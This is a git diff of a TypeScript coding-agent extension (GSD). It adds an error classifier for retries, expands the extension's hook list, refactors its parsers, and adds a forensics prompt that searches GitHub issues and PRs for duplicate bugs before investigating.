-      const hasSliceSummary = !!(sliceSummaryPath && await loadFile(sliceSummaryPath));
-      const hasSliceUat = existsSync(sliceUatPath);
-
-      if (allTasksDone && !hasSliceSummary) {
-        issues.push({
-          severity: "error",
-          code: "all_tasks_done_missing_slice_summary",
-          scope: "slice",
-          unitId,
-          message: `All tasks are done but ${slice.id}-SUMMARY.md is missing`,
-          file: relSliceFile(basePath, milestoneId, slice.id, "SUMMARY"),
-          fixable: true,
-        });
-        dryRunCanFix("all_tasks_done_missing_slice_summary", `create placeholder summary for ${unitId}`);
-        if (shouldFix("all_tasks_done_missing_slice_summary")) await ensureSliceSummaryStub(basePath, milestoneId, slice.id, fixesApplied);
-      }
-
-      if (allTasksDone && !hasSliceUat) {
-        issues.push({
-          severity: "warning",
-          code: "all_tasks_done_missing_slice_uat",
-          scope: "slice",
-          unitId,
-          message: `All tasks are done but ${slice.id}-UAT.md is missing`,
-          file: `${relSlicePath(basePath, milestoneId, slice.id)}/${slice.id}-UAT.md`,
-          fixable: true,
-        });
-        dryRunCanFix("all_tasks_done_missing_slice_uat", `create placeholder UAT for ${unitId}`);
-        if (shouldFix("all_tasks_done_missing_slice_uat")) await ensureSliceUatStub(basePath, milestoneId, slice.id, fixesApplied);
-      }
-
-      if (allTasksDone && !slice.done) {
-        issues.push({
-          severity: "error",
-          code: "all_tasks_done_roadmap_not_checked",
-          scope: "slice",
-          unitId,
-          message: `All tasks are done but roadmap still shows ${slice.id} as incomplete`,
-          file: relMilestoneFile(basePath, milestoneId, "ROADMAP"),
-          fixable: true,
-        });
-        dryRunCanFix("all_tasks_done_roadmap_not_checked", `mark ${slice.id} done in roadmap`);
-        if (shouldFix("all_tasks_done_roadmap_not_checked") && (hasSliceSummary || existsSync(join(slicePath, `${slice.id}-SUMMARY.md`)))) {
-          await markSliceDoneInRoadmap(basePath, milestoneId, slice.id, fixesApplied);
-        }
-      }
-
-      if (slice.done && !hasSliceSummary) {
-        issues.push({
-          severity: "error",
-          code: "slice_checked_missing_summary",
-          scope: "slice",
-          unitId,
-          message: `Roadmap marks ${slice.id} complete but slice summary is missing`,
-          file: relSliceFile(basePath, milestoneId, slice.id, "SUMMARY"),
-          fixable: true,
-        });
-        if (!allTasksDone) {
-          dryRunCanFix("slice_checked_missing_summary", `uncheck ${slice.id} in roadmap (tasks incomplete)`);
-          if (shouldFix("slice_checked_missing_summary")) {
-            await markSliceUndoneInRoadmap(basePath, milestoneId, slice.id, fixesApplied);
-          }
-        }
-      }
-
-      if (slice.done && !hasSliceUat) {
-        issues.push({
-          severity: "warning",
-          code: "slice_checked_missing_uat",
-          scope: "slice",
-          unitId,
-          message: `Roadmap marks ${slice.id} complete but UAT file is missing`,
-          file: `${relSlicePath(basePath, milestoneId, slice.id)}/${slice.id}-UAT.md`,
-          fixable: true,
-        });
-      }
     }
 
     // Milestone-level check: all slices done but no validation file
-    if (isMilestoneComplete(roadmap) && !resolveMilestoneFile(basePath, milestoneId, "VALIDATION") && !resolveMilestoneFile(basePath, milestoneId, "SUMMARY")) {
+    const milestoneComplete = roadmap.slices.length > 0 && roadmap.slices.every(s => s.done);
+    if (milestoneComplete && !resolveMilestoneFile(basePath, milestoneId, "VALIDATION") && !resolveMilestoneFile(basePath, milestoneId, "SUMMARY")) {
       issues.push({
         severity: "info",
         code: "all_slices_done_missing_milestone_validation",
@@ -1010,7 +780,7 @@ export async function runGSDDoctor(basePath: string, options?: { fix?: boolean;
     }
 
     // Milestone-level check: all slices done but no milestone summary
-    if (isMilestoneComplete(roadmap) && !resolveMilestoneFile(basePath, milestoneId, "SUMMARY")) {
+    if (milestoneComplete && !resolveMilestoneFile(basePath, milestoneId, "SUMMARY")) {
       issues.push({
         severity: "warning",
         code: "all_slices_done_missing_milestone_summary",
diff --git a/src/resources/extensions/gsd/error-classifier.ts b/src/resources/extensions/gsd/error-classifier.ts
new file mode 100644
index 000000000..604167451
--- /dev/null
+++ b/src/resources/extensions/gsd/error-classifier.ts
@@ -0,0 +1,141 @@
+/**
+ * Unified error classifier for provider/network/server errors.
+ *
+ * Consolidates patterns from:
+ *  - isTransientNetworkError()  in preferences-models.ts
+ *  - classifyProviderError()    in provider-error-pause.ts
+ *
+ * Single entry point: classifyError(errorMsg, retryAfterMs?)
+ *
+ * @see https://github.com/gsd-build/gsd/issues/2577
+ */
+
+// ── ErrorClass discriminated union ──────────────────────────────────────────
+
+export type ErrorClass =
+  | { kind: "network";      retryAfterMs: number }
+  | { kind: "rate-limit";   retryAfterMs: number }
+  | { kind: "server";       retryAfterMs: number }
+  | { kind: "stream";       retryAfterMs: number }
+  | { kind: "connection";   retryAfterMs: number }
+  | { kind: "model-error" }
+  | { kind: "permanent" }
+  | { kind: "unknown" };
+
+// ── RetryState ──────────────────────────────────────────────────────────────
+
+export interface RetryState {
+  networkRetryCount: number;
+  consecutiveTransientCount: number;
+  currentRetryModelId: string | undefined;
+}
+
+export function createRetryState(): RetryState {
+  return { networkRetryCount: 0, consecutiveTransientCount: 0, currentRetryModelId: undefined };
+}
+
+export function resetRetryState(state: RetryState): void {
+  state.networkRetryCount = 0;
+  state.consecutiveTransientCount = 0;
+  state.currentRetryModelId = undefined;
+}
+
+// ── Classification ──────────────────────────────────────────────────────────
+
+const PERMANENT_RE = /auth|unauthorized|forbidden|invalid.*key|invalid.*api|billing|quota exceeded|account/i;
+const RATE_LIMIT_RE = /rate.?limit|too many requests|429/i;
+const NETWORK_RE = /network|ECONNRESET|ETIMEDOUT|ECONNREFUSED|socket hang up|fetch failed|connection.*reset|dns/i;
+const SERVER_RE = /internal server error|500|502|503|overloaded|server_error|api_error|service.?unavailable/i;
+// ECONNRESET/ECONNREFUSED are in NETWORK_RE (same-model retry first).
+const CONNECTION_RE = /terminated|connection.?refused|other side closed|EPIPE|network.?(?:is\s+)?unavailable|stream_exhausted(?:_without_result)?/i;
+// Catch-all for V8 JSON.parse errors: all modern variants end with "in JSON at position \d+".
+// This eliminates the need to enumerate every error message variant individually.
+const STREAM_RE = /in JSON at position \d+|Unexpected end of JSON|SyntaxError.*JSON/i;
+const RESET_DELAY_RE = /reset in (\d+)s/i;
+
+/**
+ * Classify an error message into one of the ErrorClass kinds.
+ *
+ * Classification order:
+ *  1. Permanent (auth/billing/quota) — unless also rate-limited
+ *  2. Rate limit (429, rate.?limit, too many requests)
+ *  3. Network (ECONNRESET, ETIMEDOUT, socket hang up, fetch failed, dns)
+ *  4. Stream truncation (malformed JSON from mid-stream cut)
+ *  5. Server (500/502/503, overloaded, server_error)
+ *  6. Connection (terminated, ECONNREFUSED, EPIPE, other side closed)
+ *  7. Unknown
+ */
+export function classifyError(errorMsg: string, retryAfterMs?: number): ErrorClass {
+  const isPermanent = PERMANENT_RE.test(errorMsg);
+  const isRateLimit = RATE_LIMIT_RE.test(errorMsg);
+
+  // 1. Permanent — but rate limit takes precedence
+  if (isPermanent && !isRateLimit) {
+    return { kind: "permanent" };
+  }
+
+  // 2. Rate limit
+  if (isRateLimit) {
+    if (retryAfterMs != null && retryAfterMs > 0) {
+      return { kind: "rate-limit", retryAfterMs };
+    }
+    const resetMatch = errorMsg.match(RESET_DELAY_RE);
+    const delayMs = resetMatch ? Number(resetMatch[1]) * 1000 : 60_000;
+    return { kind: "rate-limit", retryAfterMs: delayMs };
+  }
+
+  // 3. Network errors — same-model retry candidate
+  if (NETWORK_RE.test(errorMsg)) {
+    // Exclude if also matches permanent signals (already handled above for
+    // rate-limit, but double-check for non-rate-limit permanent overlap like
+    // "billing" appearing alongside "network").
+    return { kind: "network", retryAfterMs: retryAfterMs ?? 3_000 };
+  }
+
+  // 4. Stream truncation — downstream symptom of connection drop
+  if (STREAM_RE.test(errorMsg)) {
+    return { kind: "stream", retryAfterMs: retryAfterMs ?? 15_000 };
+  }
+
+  // 5. Server errors — try fallback model
+  if (SERVER_RE.test(errorMsg)) {
+    return { kind: "server", retryAfterMs: retryAfterMs ?? 30_000 };
+  }
+
+  // 6. Connection errors — try fallback model
+  if (CONNECTION_RE.test(errorMsg)) {
+    return { kind: "connection", retryAfterMs: retryAfterMs ?? 15_000 };
+  }
+
+  // 7. Unknown
+  return { kind: "unknown" };
+}
+
+// ── Helpers ─────────────────────────────────────────────────────────────────
+
+/** Returns true for all transient (auto-resumable) error kinds. */
+export function isTransient(cls: ErrorClass): boolean {
+  switch (cls.kind) {
+    case "network":
+    case "rate-limit":
+    case "server":
+    case "stream":
+    case "connection":
+      return true;
+    default:
+      return false;
+  }
+}
+
+/**
+ * Backward-compatible thin wrapper.
+ *
+ * Returns true when the error is a transient *network* error specifically
+ * (worth retrying the same model). Permanent signals (auth, billing, quota)
+ * cause this to return false even if a network keyword is present.
+ */
+export function isTransientNetworkError(errorMsg: string): boolean {
+  if (!errorMsg) return false;
+  const cls = classifyError(errorMsg);
+  return cls.kind === "network";
+}
diff --git a/src/resources/extensions/gsd/extension-manifest.json b/src/resources/extensions/gsd/extension-manifest.json
index a1b2877be..ca0063a5f 100644
--- a/src/resources/extensions/gsd/extension-manifest.json
+++ b/src/resources/extensions/gsd/extension-manifest.json
@@ -12,7 +12,22 @@
       "gsd_requirement_update", "gsd_milestone_generate_id"
     ],
     "commands": ["gsd", "kill", "worktree", "exit"],
-    "hooks": ["session_start"],
+    "hooks": [
+      "session_start",
+      "session_switch",
+      "bash_transform",
+      "session_fork",
+      "before_agent_start",
+      "agent_end",
+      "session_before_compact",
+      "session_shutdown",
+      "tool_call",
+      "tool_result",
+      "tool_execution_start",
+      "tool_execution_end",
+      "model_select",
+      "before_provider_request"
+    ],
     "shortcuts": ["Ctrl+Alt+G"]
   }
 }
diff --git a/src/resources/extensions/gsd/file-watcher.ts b/src/resources/extensions/gsd/file-watcher.ts
index 98928ed62..a8b0be19c 100644
--- a/src/resources/extensions/gsd/file-watcher.ts
+++ b/src/resources/extensions/gsd/file-watcher.ts
@@ -3,6 +3,7 @@ import type { EventBus } from "@gsd/pi-coding-agent";
 import { relative } from "node:path";
 
 let watcher: FSWatcher | null = null;
+let pending = new Map<string, ReturnType<typeof setTimeout>>();
 
 const EVENT_MAP: Record<string, string> = {
 	"settings.json": "settings-changed",
@@ -36,7 +37,7 @@ export async function startFileWatcher(
 
 	const { watch } = await import("chokidar");
 
-	const pending = new Map<string, ReturnType<typeof setTimeout>>();
+	pending = new Map<string, ReturnType<typeof setTimeout>>();
 
 	function debounceEmit(event: string): void {
 		const existing = pending.get(event);
@@ -90,6 +91,8 @@ export async function startFileWatcher(
  * Stop the file watcher and clean up resources.
  */
 export async function stopFileWatcher(): Promise<void> {
+	for (const timer of pending.values()) clearTimeout(timer);
+	pending.clear();
 	if (watcher) {
 		await watcher.close();
 		watcher = null;
diff --git a/src/resources/extensions/gsd/files.ts b/src/resources/extensions/gsd/files.ts
index c5d7fada0..a59a8773a 100644
--- a/src/resources/extensions/gsd/files.ts
+++ b/src/resources/extensions/gsd/files.ts
@@ -10,8 +10,7 @@ import { resolveMilestoneFile, relMilestoneFile, resolveGsdRootFile } from './pa
 import { milestoneIdSort, findMilestoneIds } from './milestone-ids.js';
 
 import type {
-  Roadmap, BoundaryMapEntry,
-  SlicePlan, TaskPlanEntry, TaskPlanFile, TaskPlanFrontmatter,
+  TaskPlanFile, TaskPlanFrontmatter,
   Summary, SummaryFrontmatter, SummaryRequires, FileModified,
   Continue, ContinueFrontmatter, ContinueStatus,
   RequirementCounts,
@@ -21,9 +20,7 @@ import type {
 } from './types.js';
 
 import { checkExistingEnvKeys } from './env-utils.js';
-import { parseRoadmapSlices } from './roadmap-slices.js';
-import { nativeParseRoadmap, nativeExtractSection, nativeParsePlanFile, nativeParseSummaryFile, NATIVE_UNAVAILABLE } from './native-parser-bridge.js';
-import { debugTime, debugCount } from './debug-logger.js';
+import { nativeExtractSection, nativeParseSummaryFile, NATIVE_UNAVAILABLE } from './native-parser-bridge.js';
 import { CACHE_MAX } from './constants.js';
 import { splitFrontmatter, parseFrontmatterMap } from '../shared/frontmatter.js';
 
@@ -55,9 +52,41 @@ function cachedParse<T>(content: string, tag: string, parseFn: (c: string) => T)
   return result;
 }
 
-/** Clear the module-scoped parse cache. Call when files change on disk. */
+// ─── Cross-module cache clear registry ────────────────────────────────────
+// parsers-legacy.ts registers its cache-clear callback here at module init
+// to avoid circular imports. clearParseCache() calls all registered callbacks.
+const _cacheClearCallbacks: (() => void)[] = [];
+
+/** Register a callback to be invoked when clearParseCache() is called.
+ *  Used by parsers-legacy.ts to synchronously clear its own cache. */
+export function registerCacheClearCallback(cb: () => void): void {
+  _cacheClearCallbacks.push(cb);
+}
+
+/** Clear the module-scoped parse cache. Call when files change on disk.
+ *  Also clears any registered external caches (e.g. parsers-legacy.ts). */
 export function clearParseCache(): void {
   _parseCache.clear();
+  for (const cb of _cacheClearCallbacks) cb();
+}
+
+// ─── Platform shortcuts ───────────────────────────────────────────────────
+
+const IS_MAC = process.platform === "darwin";
+
+/**
+ * Format a keyboard shortcut for the current OS.
+ * Input: modifier key combo like "Ctrl+Alt+G"
+ * Output: "⌃⌥G" on macOS, "Ctrl+Alt+G" on Windows/Linux.
+ */
+export function formatShortcut(combo: string): string {
+  if (!IS_MAC) return combo;
+  return combo
+    .replace(/Ctrl\+Alt\+/i, "⌃⌥")
+    .replace(/Ctrl\+/i, "⌃")
+    .replace(/Alt\+/i, "⌥")
+    .replace(/Shift\+/i, "⇧")
+    .replace(/Cmd\+/i, "⌘");
 }
 
 // ─── Helpers ───────────────────────────────────────────────────────────────
@@ -103,6 +132,25 @@ function escapeRegex(s: string): string {
   return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
 }
 
+/**
+ * Normalize a task-plan file reference that may include inline description text
+ * after the path, for example:
+ *   "docs/file.md — explanation"
+ *   "docs/file.md - explanation"
+ */
+export function normalizePlannedFileReference(value: string): string {
+  const trimmed = value.trim().replace(/`/g, "");
+  const match = /^(.*?)(?:\s+(?:—|-)\s+)(.+)$/.exec(trimmed);
+  if (!match) return trimmed;
+
+  const pathCandidate = match[1].trim();
+  if (pathCandidate.includes("/") || pathCandidate.includes("\\") || pathCandidate.includes(".")) {
+    return pathCandidate;
+  }
+
+  return trimmed;
+}
+
 /** Parse bullet list items from a text block. */
 export function parseBullets(text: string): string[] {
   return text.split('\n')
@@ -117,95 +165,6 @@ export function extractBoldField(text: string, key: string): string | null {
   return match ? match[1].trim() : null;
 }
 
-// ─── Roadmap Parser ────────────────────────────────────────────────────────
-
-export function parseRoadmap(content: string): Roadmap {
-  return cachedParse(content, 'roadmap', _parseRoadmapImpl);
-}
-
-function _parseRoadmapImpl(content: string): Roadmap {
-  const stopTimer = debugTime("parse-roadmap");
-  // Try native parser first for better performance
-  const nativeResult = nativeParseRoadmap(content);
-  if (nativeResult) {
-    stopTimer({ native: true, slices: nativeResult.slices.length, boundaryEntries: nativeResult.boundaryMap.length });
-    debugCount("parseRoadmapCalls");
-    return nativeResult;
-  }
-
-  const lines = content.split('\n');
-
-  const h1 = lines.find(l => l.startsWith('# '));
-  const title = h1 ? h1.slice(2).trim() : '';
-  const vision = extractBoldField(content, 'Vision') || '';
-
-  const scSection = extractSection(content, 'Success Criteria', 2) ||
-    (() => {
-      const idx = content.indexOf('**Success Criteria:**');
-      if (idx === -1) return '';
-      const rest = content.slice(idx);
-      const nextSection = rest.indexOf('\n---');
-      const block = rest.slice(0, nextSection === -1 ? undefined : nextSection);
-      const firstNewline = block.indexOf('\n');
-      return firstNewline === -1 ? '' : block.slice(firstNewline + 1);
-    })();
-  const successCriteria = scSection ? parseBullets(scSection) : [];
-
-  // Slices
-  const slices = parseRoadmapSlices(content);
-
-  // Boundary map
-  const boundaryMap: BoundaryMapEntry[] = [];
-  const bmSection = extractSection(content, 'Boundary Map');
-
-  if (bmSection) {
-    const h3Sections = extractAllSections(bmSection, 3);
-    for (const [heading, sectionContent] of h3Sections) {
-      const arrowMatch = heading.match(/^(\S+)\s*→\s*(\S+)/);
-      if (!arrowMatch) continue;
-
-      const fromSlice = arrowMatch[1];
-      const toSlice = arrowMatch[2];
-
-      let produces = '';
-      let consumes = '';
-
-      // Use indexOf-based parsing instead of [\s\S]*? regex to avoid
-      // catastrophic backtracking on content with code fences (#468).
-      const prodIdx = sectionContent.search(/^Produces:\s*$/m);
-      if (prodIdx !== -1) {
-        const afterProd = sectionContent.indexOf('\n', prodIdx);
-        if (afterProd !== -1) {
-          const consIdx = sectionContent.search(/^Consumes/m);
-          const endIdx = consIdx !== -1 && consIdx > afterProd ? consIdx : sectionContent.length;
-          produces = sectionContent.slice(afterProd + 1, endIdx).trim();
-        }
-      }
-
-      const consLineMatch = sectionContent.match(/^Consumes[^:]*:\s*(.+)$/m);
-      if (consLineMatch) {
-        consumes = consLineMatch[1].trim();
-      }
-      if (!consumes) {
-        const consIdx = sectionContent.search(/^Consumes[^:]*:\s*$/m);
-        if (consIdx !== -1) {
-          const afterCons = sectionContent.indexOf('\n', consIdx);
-          if (afterCons !== -1) {
-            consumes = sectionContent.slice(afterCons + 1).trim();
-          }
-        }
-      }
-
-      boundaryMap.push({ fromSlice, toSlice, produces, consumes });
-    }
-  }
-
-  const result = { title, vision, successCriteria, slices, boundaryMap };
-  stopTimer({ native: false, slices: slices.length, boundaryEntries: boundaryMap.length });
-  debugCount("parseRoadmapCalls");
-  return result;
-}
-
 // ─── Secrets Manifest Parser ───────────────────────────────────────────────
 
 const VALID_STATUSES = new Set<SecretsManifestEntryStatus>(['pending', 'collected', 'skipped']);
@@ -314,131 +273,6 @@ export function parseTaskPlanFile(content: string): TaskPlanFile {
   };
 }
 
-export function parsePlan(content: string): SlicePlan {
-  return cachedParse(content, 'plan', _parsePlanImpl);
-}
-
-function _parsePlanImpl(content: string): SlicePlan {
-  const stopTimer = debugTime("parse-plan");
-  const [, body] = splitFrontmatter(content);
-  // Try native parser first for better performance
-  const nativeResult = nativeParsePlanFile(body);
-  if (nativeResult) {
-    stopTimer({ native: true });
-    return {
-      id: nativeResult.id,
-      title: nativeResult.title,
-      goal: nativeResult.goal,
-      demo: nativeResult.demo,
-      mustHaves: nativeResult.mustHaves,
-      tasks: nativeResult.tasks.map(t => ({
-        id: t.id,
-        title: t.title,
-        description: t.description,
-        done: t.done,
-        estimate: t.estimate,
-        ...(t.files.length > 0 ? { files: t.files } : {}),
-        ...(t.verify ? { verify: t.verify } : {}),
-      })),
-      filesLikelyTouched: nativeResult.filesLikelyTouched,
-    };
-  }
-
-  const lines = body.split('\n');
-
-  const h1 = lines.find(l => l.startsWith('# '));
-  let id = '';
-  let title = '';
-  if (h1) {
-    const match = h1.match(/^#\s+(\w+):\s+(.+)/);
-    if (match) {
-      id = match[1];
-      title = match[2].trim();
-    } else {
-      title = h1.slice(2).trim();
-    }
-  }
-
-  const goal = extractBoldField(body, 'Goal') || '';
-  const demo = extractBoldField(body, 'Demo') || '';
-
-  const mhSection = extractSection(body, 'Must-Haves');
-  const mustHaves = mhSection ? parseBullets(mhSection) : [];
-
-  const tasksSection = extractSection(body, 'Tasks');
-  const tasks: TaskPlanEntry[] = [];
-
-  if (tasksSection) {
-    const taskLines = tasksSection.split('\n');
-    let currentTask: TaskPlanEntry | null = null;
-
-    for (const line of taskLines) {
-      const cbMatch = line.match(/^-\s+\[([ xX])\]\s+\*\*([\w.]+):\s+(.+?)\*\*\s*(.*)/);
-      // Heading-style: ### T01 -- Title, ### T01: Title, ### T01 — Title
-      const hdMatch = !cbMatch ? line.match(/^#{2,4}\s+([\w.]+)\s*(?:--|—|:)\s*(.+)/) : null;
-      if (cbMatch || hdMatch) {
-        if (currentTask) tasks.push(currentTask);
-
-        if (cbMatch) {
-          const rest = cbMatch[4] || '';
-          const estMatch = rest.match(/`est:([^`]+)`/);
-          const estimate = estMatch ? estMatch[1] : '';
-
-          currentTask = {
-            id: cbMatch[2],
-            title: cbMatch[3],
-            description: '',
-            done: cbMatch[1].toLowerCase() === 'x',
-            estimate,
-          };
-        } else {
-          const rest = hdMatch![2] || '';
-          const titleEstMatch = rest.match(/^(.+?)\s*`est:([^`]+)`\s*$/);
-          const title = titleEstMatch ? titleEstMatch[1].trim() : rest.trim();
-          const estimate = titleEstMatch ? titleEstMatch[2] : '';
-
-          currentTask = {
-            id: hdMatch![1],
-            title,
-            description: '',
-            done: false,
-            estimate,
-          };
-        }
-      } else if (currentTask && line.match(/^\s*-\s+Files:\s*(.*)/)) {
-        const filesMatch = line.match(/^\s*-\s+Files:\s*(.*)/);
-        if (filesMatch) {
-          currentTask.files = filesMatch[1]
-            .split(',')
-            .map(f => f.replace(/`/g, '').trim())
-            .filter(f => f.length > 0);
-        }
-      } else if (currentTask && line.match(/^\s*-\s+Verify:\s*(.*)/)) {
-        const verifyMatch = line.match(/^\s*-\s+Verify:\s*(.*)/);
-        if (verifyMatch) {
-          currentTask.verify = verifyMatch[1].trim();
-        }
-      } else if (currentTask && line.trim() && !line.startsWith('#')) {
-        const desc = line.trim();
-        if (desc) {
-          currentTask.description = currentTask.description
-            ? currentTask.description + ' ' + desc
-            : desc;
-        }
-      }
-    }
-    if (currentTask) tasks.push(currentTask);
-  }
-
-  const filesSection = extractSection(body, 'Files Likely Touched');
-  const filesLikelyTouched = filesSection ? parseBullets(filesSection) : [];
-
-  const result = { id, title, goal, demo, mustHaves, tasks, filesLikelyTouched };
-  stopTimer({ tasks: tasks.length });
-  debugCount("parsePlanCalls");
-  return result;
-}
-
 // ─── Summary Parser ────────────────────────────────────────────────────────
 
 export function parseSummary(content: string): Summary {
@@ -473,6 +307,8 @@ function _parseSummaryImpl(content: string): Summary {
       whatHappened: nativeResult.whatHappened,
       deviations: nativeResult.deviations,
       filesModified: nativeResult.filesModified,
+      followUps: extractSection(content, 'Follow-ups') ?? '',
+      knownLimitations: extractSection(content, 'Known Limitations') ?? '',
     };
   }
 
@@ -534,7 +370,10 @@ function _parseSummaryImpl(content: string): Summary {
     }
   }
 
-  return { frontmatter, title, oneLiner, whatHappened, deviations, filesModified };
+  const followUps = extractSection(body, 'Follow-ups') ?? '';
+  const knownLimitations = extractSection(body, 'Known Limitations') ?? '';
+
+  return { frontmatter, title, oneLiner, whatHappened, deviations, filesModified, followUps, knownLimitations };
 }
 
 // ─── Continue Parser ───────────────────────────────────────────────────────
@@ -802,11 +641,11 @@ export function parseTaskPlanIO(content: string): { inputFiles: string[]; output
       let match: RegExpExecArray | null;
       backtickPathRegex.lastIndex = 0;
       while ((match = backtickPathRegex.exec(trimmed)) !== null) {
-        const candidate = match[1];
+        const candidate = normalizePlannedFileReference(match[1]);
         // Filter out things that look like code tokens rather than file paths
         // (e.g. `true`, `false`, `npm run test`). A file path has at least one
         // dot or slash.
-        if (candidate.includes("/") || candidate.includes(".")) {
+        if (candidate.includes("/") || candidate.includes("\\") || candidate.includes(".")) {
           paths.push(candidate);
         }
       }
diff --git a/src/resources/extensions/gsd/forensics.ts b/src/resources/extensions/gsd/forensics.ts
index 62c89279d..ba2746f8b 100644
--- a/src/resources/extensions/gsd/forensics.ts
+++ b/src/resources/extensions/gsd/forensics.ts
@@ -28,13 +28,18 @@ import { deriveState } from "./state.js";
 import { isAutoActive } from "./auto.js";
 import { loadPrompt } from "./prompt-loader.js";
 import { gsdRoot } from "./paths.js";
+import { isDbAvailable, getAllMilestones, getMilestoneSlices, getSliceTasks } from "./gsd-db.js";
+import { isClosedStatus } from "./status-guards.js";
 import { formatDuration } from "../shared/format-utils.js";
 import { getAutoWorktreePath } from "./auto-worktree.js";
+import { loadEffectiveGSDPreferences, loadGlobalGSDPreferences, getGlobalGSDPreferencesPath } from "./preferences.js";
+import { showNextAction } from "../shared/tui.js";
+import { ensurePreferencesFile, serializePreferencesToFrontmatter } from "./commands-prefs-wizard.js";
 
 // ─── Types ────────────────────────────────────────────────────────────────────
 
-interface ForensicAnomaly {
-  type: "stuck-loop" | "cost-spike" | "timeout" | "missing-artifact" | "crash" | "doctor-issue" | "error-trace";
+export interface ForensicAnomaly {
+  type: "stuck-loop" | "cost-spike" | "timeout" | "missing-artifact" | "crash" | "doctor-issue" | "error-trace" | "journal-stuck" | "journal-guard-block" | "journal-rapid-iterations" | "journal-worktree-failure";
   severity: "info" | "warning" | "error";
   unitType?: string;
   unitId?: string;
@@ -51,6 +56,46 @@ interface UnitTrace {
   mtime: number;
 }
 
+/** Summary of .gsd/activity/ directory metadata. */
+interface ActivityLogMeta {
+  fileCount: number;
+  totalSizeBytes: number;
+  oldestFile: string | null;
+  newestFile: string | null;
+}
+
+/**
+ * Summary of .gsd/journal/ data for forensic investigation.
+ *
+ * To avoid loading huge journal histories into memory, only the most recent
+ * daily files are fully parsed. Older files are line-counted for totals.
+ * Event counts and flow IDs reflect only recent files.
+ */
+interface JournalSummary {
+  /** Total journal entries across all files (recent parsed + older line-counted) */
+  totalEntries: number;
+  /** Distinct flow IDs from recent files (each = one auto-mode iteration) */
+  flowCount: number;
+  /** Event counts by type (from recent files only) */
+  eventCounts: Record<string, number>;
+  /** Most recent journal entries (last 20) for context */
+  recentEvents: { ts: string; flowId: string; eventType: string; rule?: string; unitId?: string }[];
+  /** Date range of journal data */
+  oldestEntry: string | null;
+  newestEntry: string | null;
+  /** Daily file count */
+  fileCount: number;
+}
+
+interface DbCompletionCounts {
+  milestones: number;
+  milestonesTotal: number;
+  slices: number;
+  slicesTotal: number;
+  tasks: number;
+  tasksTotal: number;
+}
+
 interface ForensicReport {
   gsdVersion: string;
   timestamp: string;
@@ -61,10 +106,76 @@ interface ForensicReport {
   unitTraces: UnitTrace[];
   metrics: MetricsLedger | null;
   completedKeys: string[];
+  dbCompletionCounts: DbCompletionCounts | null;
   crashLock: LockData | null;
   doctorIssues: DoctorIssue[];
   anomalies: ForensicAnomaly[];
   recentUnits: { type: string; id: string; cost: number; duration: number; model: string; finishedAt: number }[];
+  journalSummary: JournalSummary | null;
+  activityLogMeta: ActivityLogMeta | null;
+}
+
+// ─── Duplicate Detection ──────────────────────────────────────────────────────
+
+const DEDUP_PROMPT_SECTION = `
+## Pre-Investigation: Duplicate Check (REQUIRED)
+
+Before reading GSD source code or performing deep analysis, you MUST search for existing issues and PRs that may already address this bug. This avoids wasting tokens on already-fixed bugs.
+
+### Search Steps
+
+Use keywords from the user's problem description and the anomaly summaries in the forensic report above.
+
+1. **Search closed issues** for similar keywords:
+   \`\`\`
+   gh issue list --repo gsd-build/gsd-2 --state closed --search "<keywords from root cause>" --limit 20
+   \`\`\`
+
+2. **Search open PRs** that might contain the fix:
+   \`\`\`
+   gh pr list --repo gsd-build/gsd-2 --state open --search "<keywords>" --limit 10
+   \`\`\`
+
+3. **Search merged PRs** that may have already fixed this:
+   \`\`\`
+   gh pr list --repo gsd-build/gsd-2 --state merged --search "<keywords>" --limit 10
+   \`\`\`
+
+### Analysis
+
+For each result, compare it against the user's reported symptoms and the forensic anomalies:
+- Does the issue describe the same code path or file?
+- Does the PR modify the area related to the reported symptoms?
+- Is the symptom description semantically similar even if keywords differ?
+
+### Decision Gate
+
+- **Merged PR clearly fixes the described symptom** → Report "Already fixed by PR #X" with brief explanation. Skip full investigation.
+- **Open issue matches** → Report "Existing issue #Y covers this." Offer to add forensic evidence. Skip full investigation unless user asks for deeper analysis.
+- **No matches** → Proceed to full investigation below.
+`;
+
+async function writeForensicsDedupPref(ctx: ExtensionCommandContext, enabled: boolean): Promise<void> {
+  const prefsPath = getGlobalGSDPreferencesPath();
+  await ensurePreferencesFile(prefsPath, ctx, "global");
+  const existing = loadGlobalGSDPreferences();
+  const prefs: Record<string, unknown> = existing?.preferences ? { ...existing.preferences } : {};
+  prefs.version = prefs.version || 1;
+  prefs.forensics_dedup = enabled;
+
+  const frontmatter = serializePreferencesToFrontmatter(prefs);
+  const raw = existsSync(prefsPath) ? readFileSync(prefsPath, "utf-8") : "";
+  let body = "\n# GSD Skill Preferences\n\nSee `~/.gsd/agent/extensions/gsd/docs/preferences-reference.md` for full field documentation and examples.\n";
+  const start = raw.startsWith("---\n") ? 4 : raw.startsWith("---\r\n") ? 5 : -1;
+  if (start !== -1) {
+    const closingIdx = raw.indexOf("\n---", start);
+    if (closingIdx !== -1) {
+      const after = raw.slice(closingIdx + 4);
+      if (after.trim()) body = after;
+    }
+  }
+
+  writeFileSync(prefsPath, `---\n${frontmatter}---${body}`, "utf-8");
 }
 
 // ─── Entry Point ──────────────────────────────────────────────────────────────
@@ -98,6 +209,29 @@ export async function handleForensics(
     return;
   }
 
+  // ─── Duplicate detection opt-in ─────────────────────────────────────────────
+  const effectivePrefs = loadEffectiveGSDPreferences()?.preferences;
+  let dedupEnabled = effectivePrefs?.forensics_dedup === true;
+
+  if (effectivePrefs?.forensics_dedup === undefined) {
+    const choice = await showNextAction(ctx, {
+      title: "Duplicate detection available",
+      summary: ["Before filing a GitHub issue, forensics can search existing issues and PRs to avoid duplicates.", "This uses additional AI tokens for analysis."],
+      actions: [
+        { id: "enable", label: "Enable duplicate detection", description: "Search issues/PRs before filing (recommended)", recommended: true },
+        { id: "skip", label: "Skip for now", description: "File without checking for duplicates" },
+      ],
+      notYetMessage: "You can enable this later via preferences (forensics_dedup: true).",
+    });
+
+    if (choice === "enable") {
+      await writeForensicsDedupPref(ctx, true);
+      dedupEnabled = true;
+    }
+  }
+
+  const dedupSection = dedupEnabled ? DEDUP_PROMPT_SECTION : "";
+
   ctx.ui.notify("Building forensic report...", "info");
 
   const report = await buildForensicReport(basePath);
@@ -117,6 +251,7 @@ export async function handleForensics(
     problemDescription,
     forensicData,
     gsdSourceDir,
+    dedupSection,
   });
 
   ctx.ui.notify(`Forensic report saved: ${relative(basePath, savedPath)}`, "info");
@@ -125,6 +260,9 @@ export async function handleForensics(
     { customType: "gsd-forensics", content, display: false },
     { triggerTurn: true },
   );
+
